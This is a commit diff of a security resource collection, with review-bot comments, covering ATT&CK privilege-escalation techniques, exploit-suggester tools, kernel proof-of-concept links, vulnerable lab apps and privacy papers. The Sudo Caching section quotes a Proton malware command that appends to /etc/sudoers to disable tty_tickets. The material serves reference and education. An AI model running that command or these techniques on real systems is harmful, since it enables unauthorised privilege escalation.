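Review bot: this hunk leaves "## Dylib Hijacking" as a heading twice in a row, separated only by a rule, so one of the two should go. The sentence ending "the same folder as the application itselfWriting Bad Malware for OSXMalware Persistence on OS X" has two reference titles fused onto its end; split them out as links or remove them.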
@ -172,45 +185,32 @@
---------------
## Exploitation for Privilege Escalation
* [Exploitation for Privilege Escalation - ATT&CK](https://attack.mitre.org/wiki/Technique/T1068)
* Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform Privilege Escalation to include use of software exploitation to circumvent those restrictions.
* When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This may be a necessary step for an adversary compromising a endpoint system that has been properly configured and limits other privilege escalation methods.
---------------
## Extra Window Memory Injection
* [Extra Window Memory Injection - ATT&CK](https://attack.mitre.org/wiki/Technique/T1181)
* Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).1 Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value.
* Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.
* Execution granted through EWM injection may take place in the address space of a separate live process. Similar to Process Injection, this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.
-------------------------------
## Exploitation of Vulnerability
* [Exploitation of Vulnerability - ATT&CK](https://attack.mitre.org/wiki/Technique/T1068)
* Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Exploiting software vulnerabilities may allow adversaries to run a command or binary on a remote system for lateral movement, escalate a current process to a higher privilege level, or bypass security mechanisms. Exploits may also allow an adversary access to privileged accounts and credentials. One example of this is MS14-068, which can be used to forge Kerberos tickets using domain user permissions.Technet MS14-068ADSecurity Detecting Forged Tickets
#### Linux
* [unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
* Shell script to check for simple privilege escalation vectors on Unix systems. Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).
* [LinEnum](https://github.com/rebootuser/LinEnum)
* Scripted Local Linux Enumeration & Privilege Escalation Checks
* [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)
* linux-exploit-suggester.sh was inspired by the excellent Linux_Exploit_Suggester script by PenturaLabs. The issue with Pentura's script however is that it isn't up to date anymore (the script was last updated in early 2014) so it lacks some recent Linux kernel exploits. linux-exploit-suggester.sh on the other hand also contains all the latest (as of early 2017) publicly known Linux kernel exploits. It is also capable to identify possible privilege escalation vectors via installed userspace packages and comes with some additional minor features that makes finding right exploit more time efficient.
* [cve-check-tool - Intel](https://github.com/clearlinux/cve-check-tool)
* Original Automated CVE Checking Tool
* [Linux Kernel Exploitation - xairy github](https://github.com/xairy/linux-kernel-exploitation)
* [Vuls: Vulnerability Scanner](https://github.com/future-architect/vuls)
* Vulnerability scanner for Linux/FreeBSD, agentless, written in golang.
* [cvechecker](https://github.com/sjvermeu/cvechecker)
* The goal of cvechecker is to report about possible vulnerabilities on your system, by scanning a list of installed software and matching results with the CVE database. This is not a bullet-proof method and you will have many false positives (ie: vulnerability is fixed with a revision-release, but the tool isn't able to detect the revision itself), yet it is still better than nothing, especially if you are running a distribution with little security coverage.
* [kernel-exploits - xairy](https://github.com/xairy/kernel-exploits)
* A bunch of proof-of-concept exploits for the Linux kernel
#### OS X
* [physmem](https://github.com/bazad/physmem)
* physmem is a physical memory inspection tool and local privilege escalation targeting macOS up through 10.12.1. It exploits either CVE-2016-1825 or CVE-2016-7617 depending on the deployment target. These two vulnerabilities are nearly identical, and exploitation can be done exactly the same. They were patched in OS X El Capitan 10.11.5 and macOS Sierra 10.12.2, respectively.
* [macOS High Sierra 10.13.1 insecure cron system](https://m4.rkw.io/blog/macos-high-sierra-10131-insecure-cron-system.html)
* Easy root
* [Exploiting appliances presentation v1.1](https://www.slideshare.net/NCC_Group/exploiting-appliances-presentation-v11vidsremoved)
* [async_wake](https://github.com/benjibobs/async_wake)
* async_wake - iOS 11.1.2 kernel exploit and PoC local kernel debugger by @i41nbeer
* [IOHIDeous](https://siguza.github.io/IOHIDeous/)
* [OS X El Capitan - Sinking the S\H/IP - Stefan Esser - Syscan360 - 2016](https://www.syscan360.org/slides/2016_SG_Stefan_Esser_OS_X_El_Capitan_Sinking_The_SHIP.pdf)
* [ZeroNights / Syscan360 2016] Abusing the Mac Recovery & OS Update Process](https://speakerdeck.com/patrickwardle/syscan360-2016-abusing-the-mac-recovery-and-os-update-process)
* Did you know that Macs contain a secondary OS that sits hidden besides OS X? This talk will initially dive into technical details of the Recovery OS, before showing that while on (newer) native hardware Apple verifies this OS, in virtualized environments this may not be the case. Due to this 'flaw' we'll describe how an attacker can infect a virtualized OS X instance with malware that is able to survive a full OS X restore. Though limited to virtual instances, such malware can also abuse this process install itself into SIP'd locations making disinfection far more difficult. It's also worth noting that this attack likely would succeed on older versions of non-virtualized OS X as well.
#### Windows
* [Windows Exploit Suggester](https://github.com/AJMartel/Windows-Exploit-Suggester)
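Review bot: this hunk introduces "Exploitation for Privilege Escalation" and still shows "Exploitation of Vulnerability" below it, both linking to the same ATT&CK technique T1068; confirm the older section is the one being removed and that its Linux, OS X and Windows tool lists are re-homed under the new heading rather than dropped with it. The older text also ends in fused reference titles ("permissions.Technet MS14-068ADSecurity Detecting Forged Tickets"). In the new bullets, "a endpoint system" should be "an endpoint system"; in the Extra Window Memory Injection bullets, "prescribe to or register a windows class" reads better as "subscribe to or register a window class", and "functions).1" carries a footnote marker.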
@ -230,6 +230,30 @@
----------------------------
## Hooking
* [Hooking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1179)
* Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via:
* Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.12
* Import address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored.234
* Inline hooking, which overwrites the first bytes in an API function to redirect code flow.254
* Similar to Process Injection, adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.
* Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access.6
* Hooking is commonly utilized by Rootkits to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors.7
* [Hooks Overview - msdn.ms](https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx)
* [Userland Rootkits: Part 1, IAT hooks - adlice.com](https://www.adlice.com/userland-rootkits-part-1-iat-hooks/)
* [Dynamic Hooking Techniques: User Mode - matt hillman](https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/)
* [Inline Hooking in Windows](https://webcache.googleusercontent.com/search?q=cache:mkBFZwQOVQAJ:https://www.exploit-db.com/docs/17802.pdf+&cd=1&hl=en&ct=clnk&gl=us)
* [gethooks](https://github.com/jay/gethooks)
* GetHooks is a program designed for the passive detection and monitoring of hooks from a limited user account.
* [winhook](https://github.com/prekageo/winhook)
---------------------------
## Image File Execution Options Injection
* [Image File Execution Options Injection - ATT&CK](https://attack.mitre.org/wiki/Technique/T1183)
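Review bot: the Hooking bullets carry fused footnote digits from the ATT&CK page ("inputs.12", "stored.234", "flow.254", "Access.6", "behaviors.7"); strip them or convert them to links. "Import address table (IAT) hooking, which use modifications" should be "which uses modifications". The seven-entry link list under this section is the same list added to the Hooking section of Persistence.md in this commit; if both files are meant to keep it, give the winhook entry a description like the others have, or reference one file from the other rather than maintaining two copies.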
@ -257,21 +281,6 @@
-------------------------------
## Local Port Monitor
* [Local Port Monitor - ATT&CK](https://attack.mitre.org/wiki/Technique/T1013)
* A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.AddMonitor This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot.Bloxham Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.Bloxham` The spoolsv.exe process also runs under SYSTEM level permissions. Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.
#### Windows
* [AddMonitor function](https://msdn.microsoft.com/en-us/library/dd183341)
-------------------------------
## New Service
@ -334,6 +343,25 @@ Search Order Hijacking
-------------------------------
## Port Monitors
* [Port Monitors - ATT&CK](https://attack.mitre.org/wiki/Technique/T1013)
* A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. This DLL can be located in `C:\Windows\System32` and will be loaded by the print spooler service, spoolsv.exe, on boot. The `spoolsv.exe` process also runs under `SYSTEM` level permissions. Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. The Registry key contains entries for the following:
Local Port
Standard TCP/IP Port
USB Monitor
WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.
#### Windows
* [AddMonitor function](https://msdn.microsoft.com/en-us/library/dd183341)
-------------------------------
## Process Injection
* [Process Injection - ATT&CK](https://attack.mitre.org/wiki/Technique/T1055)
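Review bot: the four Registry entry names (Local Port, Standard TCP/IP Port, USB Monitor, WSD Port) and the closing "Adversaries can use this technique..." sentence are not prefixed with `* `, so in Markdown they will collapse into the preceding paragraph instead of rendering as a sub-list; the Persistence.md version of this section in the same commit has them as bullets, so match it.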
@ -359,6 +387,19 @@ There are multiple approaches to injecting code into a live process. Windows imp
-------------------------------
## SID-History Injection
* [SID-History Injection - ATT&CK](https://attack.mitre.org/wiki/Technique/T1178)
* The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. An account can hold additional SIDs in the SID-History Active Directory attribute, allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
* Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as Remote Services, Windows Admin Shares, or Windows Remote Management.
-------------------------------
## Scheduled Tasks
* [Scheduled Tasks - ATT&CK](https://attack.mitre.org/wiki/Technique/T1053)
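Review bot: the SID-History Injection section added here sits between Process Injection and Scheduled Tasks, yet a later hunk in this file shows SID-History reference links (`* [SID-History attribute - msdn.ms]`, `* [Well-known security identifiers in Windows operating systems]`) immediately before "## Startup Items"; check whether that is an existing SID-History section that this one duplicates, and if so merge them so the description and its references end up together.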
@ -379,6 +420,8 @@ There are multiple approaches to injecting code into a live process. Windows imp
-------------------------------
## Service Registry Permissions Weakness
* [Service Registry Permissions Weakness - ATT&CK](https://attack.mitre.org/wiki/Technique/T1058)
@ -417,6 +460,13 @@ There are multiple approaches to injecting code into a live process. Windows imp
* [SID-History attribute - msdn.ms](https://msdn.microsoft.com/library/ms679833.aspx)
* [Well-known security identifiers in Windows operating systems](https://support.microsoft.com/en-us/help/243330/well-known-security-identifiers-in-windows-operating-systems)
-------------------------------
## Startup Items
* [Startup Items - ATT&CK](https://attack.mitre.org/wiki/Technique/T1165)
@ -441,6 +491,15 @@ There are multiple approaches to injecting code into a live process. Windows imp
-------------------------------
## Sudo Caching
* [Sudo Caching - ATT&CK](https://attack.mitre.org/wiki/Technique/T1206)
* The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments" . Since sudo was made for the system administrator, it has some useful configuration features such as a `timestamp_timeout` that is the amount of time in minutes between instances of `sudo` before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at `/var/db/sudo` with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a `tty_tickets` variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
* Adversaries can abuse poor configurations of this to escalate privileges without needing the user's password. `/var/db/sudo`'s timestamp can be monitored to see if it falls within the `timestamp_timeout` range. If it does, then malware can execute sudo commands without needing to supply the user's password. Combined with `tty_tickets` being disabled, means adversaries can do this from any tty for that user.
* The OSX Proton Malware has disabled `tty_tickets` to potentially make scripting easier by issuing echo `\'Defaults !tty_tickets\' >> /etc/sudoers`. In order for this change to be reflected, the Proton malware also must issue `killall Terminal`. As of macOS Sierra, the sudoers file has `tty_tickets` enabled by default.
---------------------
## Valid Accounts
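Review bot: in the Sudo Caching bullets the Proton command is split across the code span: "issuing echo `\'Defaults !tty_tickets\' >> /etc/sudoers`" should be one span, `echo 'Defaults !tty_tickets' >> /etc/sudoers`, without the escaped quotes. "Combined with `tty_tickets` being disabled, means adversaries can do this" needs a subject ("With `tty_tickets` disabled, adversaries can do this from any tty for that user"). Since the section otherwise reads as generic sudo behaviour but cites Proton, macOS Sierra and the `/var/db/sudo` path, state up front that the description is macOS-specific.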


+ 7
- 1
Draft/AnonOpsecPrivacy.md

@ -38,9 +38,15 @@
* [A Technical Description of Psiphon](https://psiphon.ca/en/blog/psiphon-a-technical-description)
* [Invasion of Privacy - HackerFactor](http://www.hackerfactor.com/blog/index.php?/archives/703-Invasion-of-Privacy.html)
* [What Happens Next Will Amaze You](http://idlewords.com/talks/what_happens_next_will_amaze_you.htm#six_fixes)
* [RF-Capture](http://rfcapture.csail.mit.edu/)
* RF-Capture is a device that captures a human figure through walls and occlusions. It transmits wireless signals and reconstructs a human figure by analyzing the signals' reflections. RF-Capture does not require the person to wear any sensor, and its transmitted power is 10,000 times lower than that of a standard cell-phone.
* [Paper](http://rfcapture.csail.mit.edu/rfcapture-paper.pdf)
* [Cookieless Monster: Exploring the Ecosystem of Web-based Device Fingerprinting](http://securitee.org/files/cookieless_sp2013.pdf)
* Abstract —The web has become an essential part of our society and is currently the main medium of information delivery. Billions of users browse the web on a daily basis, and there are single websites that have reached over one billion user accounts. In this environment, the ability to track users and their online habits can be very lucrative for advertising companies, yet very intrusive for the privacy of users. In this paper, we examine how web-based device fingerprint- ing currently works on the Internet. By analyzing the code of three popular browser-fingerprinting code providers, we reveal the techniques that allow websites to track users without the need of client-side identifiers. Among these techniques, we show how current commercial fingerprinting approaches use questionable practices, such as the circumvention of HTTP proxies to discover a user’s real IP address and the installation of intrusive browser plugins. At the same time, we show how fragile the browser ecosystem is against fingerprinting through the use of novel browser- identifying techniques. With so many different vendors involved in browser development, we demonstrate how one can use diversions in the browsers’ implementation to distinguish successfully not only the browser-family, but also specific major and minor versions. Browser extensions that help users spoof the user-agent of their browsers are also evaluated. We show that current commercial approaches can bypass the extensions, and, in addition, take advantage of their shortcomings by using them as additional fingerprinting features.
* [Understanding & Improving Privacy "Audits" under FTC Orders](https://cyberlaw.stanford.edu/blog/2018/04/understanding-improving-privacy-audits-under-ftc-orders)
* This new white paper, entitled “Understanding and Improving Privacy ‘Audits’ under FTC Orders,” carefully parses the third-party audits that Google and Facebook are required to conduct under their 2012 Federal Trade Commission consent orders. Using only publicly available documents, the article contrasts the FTC’s high expectations for the audits with what the FTC actually received (as released to the public in redacted form). These audits, as a practical matter, are often the only “tooth” in FTC orders to protect consumer privacy. They are critically important to accomplishing the agency’s privacy mission. As such, a failure to attend to their robust enforcement can have unintended consequences, and arguably, provide consumers with a false sense of security. The paper shows how the audits are not actually audits as commonly understood. Instead, because the FTC order language only requires third-party “assessments,” the companies submit reports that are termed “attestations.” Attestations fundamentally rely on a few vague privacy program aspects that are self-selected by the companies themselves. While the FTC could reject attestation-type assessments, the agency could also insist the companies bolster certain characteristics of the attestation assessments to make them more effective and replicate audit attributes. For example, the FTC could require a broader and deeper scope for the assessments. The agency could also require that assessors evaluate Fair Information Practices, data flows, notice/consent effectiveness, all company privacy assurances, and known order violations.
#### end Sort
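Review bot: the Cookieless Monster abstract was pasted with PDF line-break hyphenation intact ("fingerprint- ing", "browser- identifying") and a stray "Abstract —" prefix; rejoin the words and drop the prefix so it reads like the other descriptions in this list.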


+ 2
- 1
Draft/Attacking Defending Android -.md

@ -46,7 +46,8 @@ https://github.com/doridori/Android-Security-Reference
* Android Vulnerabilities Overview (AVO) is a databse of known security vulnerabilities in Android.
https://blog.gdssecurity.com/labs/2015/2/18/when-efbfbd-and-friends-come-knocking-observations-of-byte-a.html
* [Diggy](https://github.com/UltimateHackers/Diggy)
* Diggy can extract endpoints/URLs from apk files. It saves the result into a txt file for further processing.
[Intercepting HTTPS traffic of Android Nougat Applications](https://serializethoughts.com/2016/09/10/905/)
* TL;DR To intercept network traffic for Android 7.0 targeted applications, introduce a res/xml/network_security_config.xml file.
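Review bot: the "[Intercepting HTTPS traffic of Android Nougat Applications]" entry lacks the leading `* ` that every other entry in this list has, so it will render as a paragraph with its TL;DR bullet orphaned beneath it; the bare gdssecurity.com URL two lines above has the same problem and should get a title and a bullet. "databse" in the AVO description should be "database".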


+ 13
- 0
Draft/Basic Security Information.md

@ -3,11 +3,19 @@
### How to Suck at InfoSec
* [How to Suck at Information Security – A Cheat Sheet](https://zeltser.com/suck-at-security-cheat-sheet/)
* [How not to Infosec - Dan Tentler](https://www.youtube.com/watch?v=S5O47gemMNQ)
### Basic Information
* [Types of Authentication](http://www.gfi.com/blog/security-101-authentication-part-2/)
* [Access control best practices](https://srlabs.de/acs/)
@ -23,12 +31,17 @@
* [Infosec Tools of the Trade: Getting Your Hands Dirty](http://www.irongeek.com/i.php?page=videos/bsidesnashville2017/bsides-nashville-2017-green00-infosec-tools-of-the-trade-getting-your-hands-dirty-jason-smith-and-tara-wink)
* In this presentation we'll will be going over introductions to the various focuses in information security and demoing the most common tools that are used in operational security, both offense and defense. You'll leave with an idea on how to freely obtain and use these tools so that you can have what you need for that first interview: experience and a passion for security. This is a green talk for people who don't have a clue on what offensive and defensive people do operationally, from a tool perspective.
* [So You Want To Be A H6x0r Getting Started in Cybersecurity Doug White and Russ Beauchemin ](https://www.youtube.com/watch?v=rRJKghTTics)
* [How to prepare for an infosec interview - Timothy DeBlock](http://www.timothydeblock.com/eis/135)
* [Navigating Career Choices in InfoSec - Fernando Montenegro - BSides Detroit2017](https://www.youtube.com/watch?v=yM2xCjrQSY4)
* Making career choices can be intimidating and stressful. Perhaps this presentation can help. The tidal forces affecting technology impact our careers as well. If we're not actively managing them, we're leaving decisions to chance (or to others), and may not like the outcomes. This presentation describes a framework I've used over the past few years to evaluate both ongoing job satisfaction as well as new opportunities as they appear. I'm happy with the outcomes I've obtained with it, and have used this same framework when providing advice to others, and it has been well received. Hopefully it can help others as well.
* **Becoming a Penetration Tester**
* [So you think you want to be a penetration tester - Defcon24](https://www.youtube.com/watch?v=be7bvZkgFmY)
* So, you think you want to be a penetration tester, or you already are and don't understand what the difference between you and all the other "so called" penetration testers out there. Think you know the difference between a Red Team, Penetration Test and a Vulnerability assessment? Know how to write a report your clients will actually read and understand? Can you leverage the strengths of your team mates to get through tough roadblocks, migrate, pivot, pwn and pillage? No? well this talk is probably for you then! We will go through the fascinating, intense and often crazily boring on-site assessment process. Talk about planning and performing Red Teams, how they are different, and why they can be super effective and have some fun along the way. I'll tell you stories that will melt your face, brain and everything in between. Give you the answers to all of your questions you never knew you had, and probably make you question your life choices. By the end of this session you will be ready to take your next steps into the job you've always wanted, or know deep inside that you should probably look for something else. There will be no judgment or shame, only information, laughter and fun.
* [Hold my Red Bull Undergraduate Red Teaming Jonathan Gaines](https://www.youtube.com/watch?v=9vgpqRzuvLk)
* [How to become a pentester - Corelan](https://www.corelan.be/index.php/2015/10/13/how-to-become-a-pentester/)
* [Attacking Big Business](https://www.cyberis.co.uk/blog/attacking-big-business)
* **General**
* [Mozilla Enterprise Information Security](https://infosec.mozilla.org/)
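Review bot: the sub-bullets for the Irongeek, Montenegro and Defcon24 entries paste the talk abstracts in verbatim, including first-person text (`I've used`, `I'll tell you stories`) and the doubled `we'll will` in the Irongeek line, so they read as the list maintainer's own words; either trim each to a one-line summary or mark them as quoted abstracts. Also `BSides Detroit2017` in the Montenegro link text wants a space, and `Attacking Big Business` is the only item in the `**Becoming a Penetration Tester**` group with no description.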


+ 13
- 0
Draft/Building A Pentest Lab.md View File

@ -13,6 +13,7 @@
-----
### <a name="general"></a>General
* [Install AD DS using Powershell](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/deploy/install-active-directory-domain-services--level-100-#BKMK_PS)
@ -52,6 +53,14 @@
* [Vulhub - Some Docker-Compose files for vulnerabilities environment](https://github.com/vulhub/vulhub)
* [exploit_me](https://github.com/bkerler/exploit_me)
* Very vulnerable ARM application (CTF style exploitation tutorial for ARM, but portable to other platforms)
* [OWASP Damn Vulnerabl Web Sockets](https://github.com/interference-security/DVWS)
* OWASP Damn Vulnerable Web Sockets (DVWS) is a vulnerable web application which works on web sockets for client-server communication. The flow of the application is similar to DVWA. You will find more vulnerabilities than the ones listed in the application.
* [Damn Vulnerable Web App](https://github.com/ethicalhack3r/DVWA)
* Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment.
* [Damn Small Vulnerable Web](https://github.com/stamparm/DSVW)
* Damn Small Vulnerable Web (DSVW) is a deliberately vulnerable web application written in under 100 lines of code, created for educational purposes. It supports majority of (most popular) web application vulnerabilities together with appropriate attacks.
-----
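Review bot: the DVWS link text `OWASP Damn Vulnerabl Web Sockets` drops the `e` from `Vulnerable` while the description line below it spells the name correctly, so the two disagree; fix the link text so the entry is findable by search. The DVWA and DSVW descriptions are fine as-is.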
@ -61,6 +70,10 @@
* AutomatedLab is a provisioning solution and framework that lets you deploy complex labs on HyperV and Azure with simple PowerShell scripts. It supports all Windows operating systems from 2008 R2 to 2016 including Nano Server and various products like AD, Exchange, PKI, IIS, etc.
* [Automated-AD-Setup](https://github.com/OneLogicalMyth/Automated-AD-Setup)
* A PowerShell script that aims to have a fully configured domain built in under 10 minutes, but also apply security configuration and hardening.
* [Invoke-ADLabDeployer](https://github.com/outflanknl/Invoke-ADLabDeployer)
* Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams.
* [ADImporter](https://github.com/curi0usJack/ADImporter)
* When you need to simulate a real Active Directory with thousands of users you quickly find that creating realistic test accounts is not trivial. Sure enough, you can whip up a quick PowerShell one-liner that creates any number of accounts, but what if you need real first and last names? Real (existing) addresses? Postal codes matching phone area codes? I could go on. The point is that you need two things: input files with names, addresses etc. And script logic that creates user accounts from that data. This blog post provides both.
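Review bot: the ADImporter description is copied wholesale from the accompanying blog post and ends with `This blog post provides both`, which makes no sense in a link list whose target is a GitHub repo; the first-person `I could go on` likewise reads as the maintainer speaking. Trim it to the substance, e.g. `Populates a test AD with realistic user accounts (real names and addresses, postal codes matching phone area codes) from supplied input files plus the creation script.` The Invoke-ADLabDeployer and Automated-AD-Setup lines above are the right length and style to match.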